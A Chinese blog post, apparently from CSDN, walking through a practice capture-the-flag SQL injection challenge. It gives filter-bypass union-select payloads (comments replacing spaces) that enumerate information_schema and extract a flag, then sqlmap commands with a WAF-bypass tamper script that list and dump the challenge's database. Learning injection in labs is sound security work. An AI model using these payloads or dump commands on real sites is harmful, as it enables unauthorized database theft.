sql注入最简单实验 php,简单的sql注入——实验吧

我们输入1’ and ‘1’=’2,sql语句变为:

select name from user where id='1' and '1'='2'

这样查询条件为假,数据库不能读取数据。

基于上述的方式进行注入,我们首先使用 1and 1=1

4e8f6e31a6365545f86d83b5572a4bba.png

如何 1 and 1=1'

bacb34c038c11ee14e0b660af2aefd2c.png

出现错误了,然后,我们再输入:1and 1=1

60d2216f1d608db65db7d1e7c64dd0ac.png

就会发现and被过滤了并且空格被替换为+,因此我们可以推断,这个题过滤了常用的sql命令,

可以输入union and select from进行下测试,发现果然全被过滤掉了

2dfea585f6f8a9450b7b855b835cbddc.png

这个时候我们需要知道:当空格被过滤的时候,通常用()或者/**/代替空格

那么我们可以选择爆库:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

就会得到:

46e4b815e5757b6bc3a47d6c85939727.png

再找一下表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

4c5456f9b47f7d0ec1e9296d5a7ac652.png

发现有flag的表,很开森就继续爆flag:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1

9e7838aec23072961b25c97be5b1cc99.png

然而出现了错误(QAQ)

那么我们直接查询其内容吧:

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

就会得到:

5c02d3b777fd96cc0792d1f5614bdea3.png

第二题:

使用sqlmap也是可以的

这里我们会用到tamper,是Python写的,sqlmap一般自带,主要的作用是绕过WAF ,空格被过滤可以使用space2comment.py,

过滤系统对大小写敏感可以使用randomcase.py等等。

这里用的level参数是执行测试的等级(1-5,默认为1)

,sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会

测试HTTP

Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值

首先爆库:

python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment --dbs

206ea4a6478ce0d5753f47d0bc3d2eae.png

dee633697092b311f393bc7bd1add536.png

其中:1.sqlmap:启动sqlmap。2.-u:参数 指目标的URL。3.--tamper:绕过WAF脚本。

4.space2comment :tamper脚本之一用于绕过过滤空格。5.--dbs列举数据库

然后在web1数据库中查找:

python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 --table

dc2c36fbfc55f823284383bd711c9ae1.png

其中:1.-D:后面跟数据库的名字。2.--tables:列举库中的表格

然后在flag表中继续查找

python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --tamper=space2comment -D web1 -T flag --colum

944737768669dc2f497cbcc7cb68ab00.png

2b8fc40a0c26c91e35cb4fc6462fcd45.png

其中:1.-T:后面跟表格名字。2.--column列举表格中的列名

继续进行就会得到最后的结果:

1e18d7ed8b932296233e8fdf78adf7e0.png

其中:1.-C后面跟列的名字。2.--dump取出表单所有记录

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值